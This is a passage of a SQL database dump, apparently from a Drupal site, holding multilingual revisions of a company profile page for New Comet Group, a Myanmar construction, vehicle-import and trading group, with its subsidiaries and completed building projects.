src=\"/sites/default/files/inline-images/0-02-06-349a229a5607a0188a33a1c37d44950447b7e0f162a2fa88997b1fe702c7a628_22a1876ac9fe1a52_1.jpg\" data-entity-uuid=\"cd2c5107-dba9-44f1-9cc3-01a08979cc62\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/0-02-06-25fbfa2a530d20c01a2685b859a828df0faf3a9d75afd0639a5b72797d560221_8ddad4e328e0428a_1.jpg\" data-entity-uuid=\"10f2be9d-c5c4-4879-ba8f-9d4d56966d53\" data-entity-type=\"file\"><hr><p class=\"MsoListParagraphCxSpLast\"><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 27, 268, 'ja', 0, '<p>&nbsp;&nbsp; <img src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc_0.jpg\" data-entity-uuid=\"1153a72f-a283-46f1-a351-b0da59976c09\" data-entity-type=\"file\" width=\"100%\"> 「ニュー コメット グループ企業」は 1996 年に設立され、以下の支店で組織されています。<br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」<br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」<br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」<br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」<br>5.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット トレーディング エージェンシー 株式会社」</p><blockquote><h5><br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」</h5></blockquote><p><br>当社の「ニュー コメット コンストラクション株式会社」は2004年に会社登録番号(295/2004-2005)で事業を開始し、ヤンゴン地方域、エーヤーワディ地方域、ザガイン地方域、マンダレー地方域 とネピドー連合領土を拠点に自動車販売と建設機械の輸入、建設業を営んでおります。<br>当社「ニュー コメット コンストラクション株式会社」の2013-2014年と2014-2015年の竣工工事の一部は以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;国籍青少年資源開発大学(ザガイン)<br>-&nbsp;&nbsp;&nbsp;&nbsp;ザガイン大学 (教育と学習のための2階建ての建物)<br>-&nbsp;&nbsp;&nbsp;&nbsp;道路交通総局と「チェタゴンティッ建設会社」の住宅プロジェクト協力<br>&nbsp; &nbsp; &nbsp;上記の活動に加えて、</p><p>-&nbsp;&nbsp;&nbsp;&nbsp;政府機関および民間の建物の修繕工事<br>-&nbsp;&nbsp;&nbsp;&nbsp;エーヤーワディ地方域で元従業員向けに手頃な価格の住宅を建設<br>-&nbsp;&nbsp;&nbsp;&nbsp;建築設計図<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は、専門コンサルタント、専門作業員、管理責任者、工事監督者、その<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;他国内外の労働者とともに、基準に沿って最新化された資機材により、<br>&nbsp; &nbsp; &nbsp;建物、道路、橋梁の建設工事を行っております。<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は理念建築、病院、学校の設計図作成、強度計算などの慈善事業を可能<br>&nbsp;&nbsp;&nbsp;&nbsp;な限り手掛けさせていただきました。</p><img data-entity-uuid=\"e508c31a-701c-4124-88ad-65e8f89a0966\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-24dbe4bb16d2a54ef691fbd31c4506732ff80a2f3712b90f57ccc8ce4dfe77f9_a0b22c95737fa277_0.jpg\"><img data-entity-uuid=\"48b01d95-2c64-40d0-b4ef-7373eae814c2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-34e6e44107bf86b41d53ccce9f0f2bb42f7320cc464153877247fe33d75f6263_6d68ee0d1d03ab44_0.jpg\"><blockquote><h5><br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤーシュエ ピィーコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」は 2000 年 5 月 30 日に設立され、会社登録番号は(191/2001-2002)です。当社は信頼できる企業の一つであり、教育、医療、産業建築、個人住宅を提供しており、政府および民間部門の両方で多くのプロジェクトが実施されています。会社の存続期間を通じて、複雑な建設プロジェクトにおける当社の細部へのこだわりと専門知識。 当社はコスト削減ソリューションを提供する能力でクライアントから多くの賞賛を受けています。教育、医療、工業用住宅など、多くのプロジェクトを建設してきました。<br>私たちは、<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設前サービス<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;土建屋<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;デザインビルダー<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設部長を提供させていただきました。</p><img data-entity-uuid=\"58de38f3-2574-4b5c-843d-3230f047d610\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-d8522b37b78efc78db7acdeb6859eb6dac6f17114ea9d9e8132582658b69e57d_828dd20036b8de29_0.jpg\"><blockquote><h5><br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「アウン ネイ ワォンコンストラクション株式会社」は 2005年に設立され、会社登録番号は(265/2005-2006)です。同社は、民間および政府部門で住宅建築、商業建築、インテリアデザインのプロジェクトに従事しています。私たちのプロジェクトは以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;ネピドー職員住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;マンダレー ヤダナポン大学<br>-&nbsp;&nbsp;&nbsp;&nbsp;ミャワディ地域消防署<br>-&nbsp;&nbsp;&nbsp;&nbsp;さまざまな郡区の基礎教育中/高等学校。 (計32都市)<br>-&nbsp;&nbsp;&nbsp;&nbsp;手頃な価格の住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;民間住宅<br>-&nbsp;&nbsp;&nbsp;&nbsp;2階建ての建物 (ボガレ工科大学)<br>-&nbsp;&nbsp;&nbsp;&nbsp;RCC 2階建ての建物(マウビン)</p><img data-entity-uuid=\"fd9b3a24-223c-42c0-a54c-99865457abc5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-e82a8d4b88a3246f463cbabfb97d7c5e1e6062591670b60167a39b47ddfa620d_ef0c059dbd11ee9a_0.jpg\"><blockquote><h5><br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の自動車商社は1987年に外国人船員の名義で輸入許可証の売買を行う個人事業として設立されました。「ニュー コメット」株式会社は1990年に設立され、「ゼヤー ニュー コメット オートセールスとサービス株式会社」の子会社です。 「家庭用自動車」「各種サルーン自動車」「各種商用トラック」「観光・輸送用各種バス」「各種機械」を日本より直接仕入れ、輸入販売を開始いたしました。<br>当社「ゼヤー ニュー コメット オートセールスとサービス株式会社」には、業務を促進する資格のある従業員がいます。 お客様に十分にご満足いただけるよう、良い車を日本から直輸入しております。</p><img data-entity-uuid=\"ce131080-c99f-4c7c-8480-d2f179b93d87\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-18c51a8d67a390f18922d18beb910acd2a525cc797c8808eda202c393b52cf73_c5db29096f9c0740_0.jpg\"><img data-entity-uuid=\"ca35e4dc-753b-43ed-8048-698e92a9994d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-349a229a5607a0188a33a1c37d44950447b7e0f162a2fa88997b1fe702c7a628_22a1876ac9fe1a52_0.jpg\"><img data-entity-uuid=\"52c6749b-5faf-49ba-b3d8-8e53128b3263\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-25fbfa2a530d20c01a2685b859a828df0faf3a9d75afd0639a5b72797d560221_8ddad4e328e0428a_0.jpg\">', '', 'full_html'),
('page', 0, 27, 268, 'ko', 0, '<img data-entity-uuid=\"8ef82604-9360-40e2-94b8-357908e9ce24\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc_1.jpg\" width=\"100%\"><p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 272, 'en', 0, '<p><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\"><img src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc.jpg\" data-entity-uuid=\"ab23ef9a-b19e-44cb-859b-9e243b2192c9\" data-entity-type=\"file\" width=\"100%\">New Comet Group of Co.,Ltd was founded in 1996 and started operation with Branches Companies as Follow:</span></p><ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Zayya Shwe Pyi Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Aung Nay Wun Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Zeya New Comet Auto Sale &amp; Services Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;New Comet Trading Agency Co.,Ltd</span></li></ol><hr><blockquote><ol><li class=\"MsoListParagraph\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><strong>&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</strong></li></ol></blockquote><p class=\"MsoNormal\">New comet construction Co.Ltd was founded in 2004 with company Licence ( 295/ 2004-2005) and started operation construction projects , Import and sale of construction and industrial machinery and vehicles based in Yangon, Mandalay, Ayawaddy, Nay Pyi Taw, Sagaing States etc.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Some of the construction works completed by us in the financial year (2013-2014) and (2014-2015) by our ``New Comet Construction\'\' Co.,Ltd are:&nbsp;<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">Nationalities Youth Resource Development Degree College ( Sagaing)</span><o:p></o:p></p><p class=\"MsoNormal\">• Sagaing University (two storyed classroom)<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">A joint venture housing project between Road Transport Administration Department and NEW COMET Construction Co.Ltd</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">In addition to the above projects :&nbsp;</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Departmental and private building construction and repair works</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of affordable housing for ex-employees in cities in Irrawaddy Region</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Architectural design modeling</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of buildings and roads and bridges continues to be carried out according to standards with veteran consultants, professional engineers, management office staff, project supervisors from the region and other regions, skilled workers and modern equipment</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Our company has been doing charity work for as long as it is capable of designing and calculating the strength of related religious buildings, hospitals and schools.</span></p><img data-entity-uuid=\"476f718a-71af-45ea-a748-e716dfac9105\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-9aaf4a3a51396d08d35ed97687363cc74e6be060b4c3d2518ed62a91236fefb8_acbd8288eb4f0f54.jpg\" data-align=\"center\"><img data-entity-uuid=\"184a0e03-a0df-4f42-96e8-bbc39c8b4138\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-0ad4905d248f688ca70ebadf72247649a5fbd5deba8990d0e19d2e359e1c21d7_6c1588d46f55cbd7.jpg\" data-align=\"center\"><blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">2. <strong>New Zayya Shwe Pyi Construction Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"mso-spacerun:yes;\">&nbsp;</span>New Zayya Shwe Pyi Construction Co.,Ltd was founded in May 30<sup>th</sup>, 2001 with Company Registration Number (191/ 2001-2002). We standed as one of the trustful companies and completed projects in educational, health care, industrial buildings, private housing, high rise condominium in both public and private sectors.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Throughout our existence, we had been praised by our clients for our attention to detail and our ability to provide knowledge driven and cost saving solutions for the complex construction projects. We built projects in areas such as Education, Health Care, Industrial Housing.<o:p></o:p></p><p class=\"MsoNormal\">Our Services are:<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Pre Construction-Service&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;General Contractor<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Design Builder</li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; Construction Manager</span></li></ul><img data-entity-uuid=\"0cc6deae-826a-47f2-acc6-98e7502b7fc9\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-0a244db364d6f33057f99a6d2355664418f691bf95ce66f48dca0640fcf3aeac_764d2f52d6df55ab.jpg\" data-align=\"center\"><blockquote><p>3. <strong>Aung Nay Wun Construction Co., Ltd</strong></p></blockquote><p>Aung Nay Wun Construction Co.,Ltd was founded in 2005 with company registration Number (265/ 2005-2006) emphasizing in residential, commercial, construction and interior design in private and government sectors. Some of the projects we have constructed are as follow:&nbsp;<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Nay-Pyi-Taw Staff Housing Project<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Yandanar Pone College in Mandalay</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fire Station in Myawaddy Division &nbsp; &nbsp;&nbsp;</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Basic Education Middle, High Schools in various towns. (32 in total)</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Fair-priced Housing Projects&nbsp;</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Private Housing&nbsp;</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Projects in Health Industry</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Two storied Building (Technical School At Bo-Ka-Lay)&nbsp;</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Two Storied RCC Building (MaUPin)</li></ul><img data-entity-uuid=\"b6c777bb-d64f-410a-b60a-7d6444407cae\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-f8672f3444e1950fa35217b49307677ae6d33e2d99603399662eaae4f9d39190_6e3195189a60fe3d.jpg\" data-align=\"center\"><blockquote><p>4. <strong>Zeya New Comet Auto Sale &amp; Services Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoListParagraphCxSpFirst\">Our Auto Trade Company was built from 1987 by buying permit of crew permit and importation and brother company New Comet Company Ltd. At 1990 established and private car, saloon car, truck car, bus car and spare-part importation from Japan. Besides Zeya New Comet Company we cooperate with other NEW ZAYYA SHWEPYI Company, AUNG NAY WIN Company, Tai Myint Aung Company made importation of private car, truck, Bus and spare-part from Japan for (25) years with the employment of 100 workers and purchase of import permit from Ministry of Commerce.&nbsp;<o:p></o:p></p><p class=\"MsoListParagraphCxSpLast\">Our ZEYA NEW COMET Auto Services Company appointed expert staff and import Japan Car for smooth operation for customer satisfaction.</p><img data-entity-uuid=\"022e7f79-c383-4bc9-a80c-5fe2935b1fa8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-b404a964ab43ea63041db9368826ecbe1484b759d5971f33ff0104899e5df0c3_19a512351d35b26.jpg\" data-align=\"center\"><img data-entity-uuid=\"eb4b839e-2a0e-4afe-941e-2cd62886e291\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-0885134294f5bb4b35f486d660969a7bd486b5056a8cafeade7e5a8fd001dd13_c2c93978c7b2c845.jpg\" data-align=\"center\"><img data-entity-uuid=\"51693869-fa17-435c-962a-ec4967eff348\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-c6ac45848a344b2aa9f02c9e018906b5c2d5c20f7b93b2bf375667e999512d9a_97a7d435e643c3e9.jpg\" data-align=\"center\"><hr><p class=\"MsoListParagraphCxSpLast\"><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 27, 272, 'ja', 0, '<p>&nbsp;&nbsp; <img src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc_0.jpg\" data-entity-uuid=\"1153a72f-a283-46f1-a351-b0da59976c09\" data-entity-type=\"file\" width=\"100%\"> 「ニュー コメット グループ企業」は 1996 年に設立され、以下の支店で組織されています。<br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」<br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」<br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」<br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」<br>5.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット トレーディング エージェンシー 株式会社」</p><blockquote><h5><br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」</h5></blockquote><p><br>当社の「ニュー コメット コンストラクション株式会社」は2004年に会社登録番号(295/2004-2005)で事業を開始し、ヤンゴン地方域、エーヤーワディ地方域、ザガイン地方域、マンダレー地方域 とネピドー連合領土を拠点に自動車販売と建設機械の輸入、建設業を営んでおります。<br>当社「ニュー コメット コンストラクション株式会社」の2013-2014年と2014-2015年の竣工工事の一部は以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;国籍青少年資源開発大学(ザガイン)<br>-&nbsp;&nbsp;&nbsp;&nbsp;ザガイン大学 (教育と学習のための2階建ての建物)<br>-&nbsp;&nbsp;&nbsp;&nbsp;道路交通総局と「チェタゴンティッ建設会社」の住宅プロジェクト協力<br>&nbsp; &nbsp; &nbsp;上記の活動に加えて、</p><p>-&nbsp;&nbsp;&nbsp;&nbsp;政府機関および民間の建物の修繕工事<br>-&nbsp;&nbsp;&nbsp;&nbsp;エーヤーワディ地方域で元従業員向けに手頃な価格の住宅を建設<br>-&nbsp;&nbsp;&nbsp;&nbsp;建築設計図<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は、専門コンサルタント、専門作業員、管理責任者、工事監督者、その<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;他国内外の労働者とともに、基準に沿って最新化された資機材により、<br>&nbsp; &nbsp; &nbsp;建物、道路、橋梁の建設工事を行っております。<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は理念建築、病院、学校の設計図作成、強度計算などの慈善事業を可能<br>&nbsp;&nbsp;&nbsp;&nbsp;な限り手掛けさせていただきました。</p><img data-entity-uuid=\"e508c31a-701c-4124-88ad-65e8f89a0966\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-24dbe4bb16d2a54ef691fbd31c4506732ff80a2f3712b90f57ccc8ce4dfe77f9_a0b22c95737fa277_0.jpg\"><img data-entity-uuid=\"48b01d95-2c64-40d0-b4ef-7373eae814c2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-34e6e44107bf86b41d53ccce9f0f2bb42f7320cc464153877247fe33d75f6263_6d68ee0d1d03ab44_0.jpg\"><blockquote><h5><br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤーシュエ ピィーコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」は 2000 年 5 月 30 日に設立され、会社登録番号は(191/2001-2002)です。当社は信頼できる企業の一つであり、教育、医療、産業建築、個人住宅を提供しており、政府および民間部門の両方で多くのプロジェクトが実施されています。会社の存続期間を通じて、複雑な建設プロジェクトにおける当社の細部へのこだわりと専門知識。 当社はコスト削減ソリューションを提供する能力でクライアントから多くの賞賛を受けています。教育、医療、工業用住宅など、多くのプロジェクトを建設してきました。<br>私たちは、<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設前サービス<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;土建屋<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;デザインビルダー<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設部長を提供させていただきました。</p><img data-entity-uuid=\"58de38f3-2574-4b5c-843d-3230f047d610\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-d8522b37b78efc78db7acdeb6859eb6dac6f17114ea9d9e8132582658b69e57d_828dd20036b8de29_0.jpg\"><blockquote><h5><br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「アウン ネイ ワォンコンストラクション株式会社」は 2005年に設立され、会社登録番号は(265/2005-2006)です。同社は、民間および政府部門で住宅建築、商業建築、インテリアデザインのプロジェクトに従事しています。私たちのプロジェクトは以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;ネピドー職員住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;マンダレー ヤダナポン大学<br>-&nbsp;&nbsp;&nbsp;&nbsp;ミャワディ地域消防署<br>-&nbsp;&nbsp;&nbsp;&nbsp;さまざまな郡区の基礎教育中/高等学校。 (計32都市)<br>-&nbsp;&nbsp;&nbsp;&nbsp;手頃な価格の住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;民間住宅<br>-&nbsp;&nbsp;&nbsp;&nbsp;2階建ての建物 (ボガレ工科大学)<br>-&nbsp;&nbsp;&nbsp;&nbsp;RCC 2階建ての建物(マウビン)</p><img data-entity-uuid=\"fd9b3a24-223c-42c0-a54c-99865457abc5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-e82a8d4b88a3246f463cbabfb97d7c5e1e6062591670b60167a39b47ddfa620d_ef0c059dbd11ee9a_0.jpg\"><blockquote><h5><br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の自動車商社は1987年に外国人船員の名義で輸入許可証の売買を行う個人事業として設立されました。「ニュー コメット」株式会社は1990年に設立され、「ゼヤー ニュー コメット オートセールスとサービス株式会社」の子会社です。 「家庭用自動車」「各種サルーン自動車」「各種商用トラック」「観光・輸送用各種バス」「各種機械」を日本より直接仕入れ、輸入販売を開始いたしました。<br>当社「ゼヤー ニュー コメット オートセールスとサービス株式会社」には、業務を促進する資格のある従業員がいます。 お客様に十分にご満足いただけるよう、良い車を日本から直輸入しております。</p><img data-entity-uuid=\"ce131080-c99f-4c7c-8480-d2f179b93d87\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-18c51a8d67a390f18922d18beb910acd2a525cc797c8808eda202c393b52cf73_c5db29096f9c0740_0.jpg\"><img data-entity-uuid=\"ca35e4dc-753b-43ed-8048-698e92a9994d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-349a229a5607a0188a33a1c37d44950447b7e0f162a2fa88997b1fe702c7a628_22a1876ac9fe1a52_0.jpg\"><img data-entity-uuid=\"52c6749b-5faf-49ba-b3d8-8e53128b3263\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-25fbfa2a530d20c01a2685b859a828df0faf3a9d75afd0639a5b72797d560221_8ddad4e328e0428a_0.jpg\">', '', 'full_html'),
('page', 0, 27, 272, 'ko', 0, '<img data-entity-uuid=\"8ef82604-9360-40e2-94b8-357908e9ce24\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc_1.jpg\" width=\"100%\"><p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 273, 'en', 0, '<p><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\"><img src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc.jpg\" data-entity-uuid=\"ab23ef9a-b19e-44cb-859b-9e243b2192c9\" data-entity-type=\"file\" width=\"100%\">New Comet Group of Co.,Ltd was founded in 1996 and started operation with Branches Companies as Follow:</span></p><ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Comet 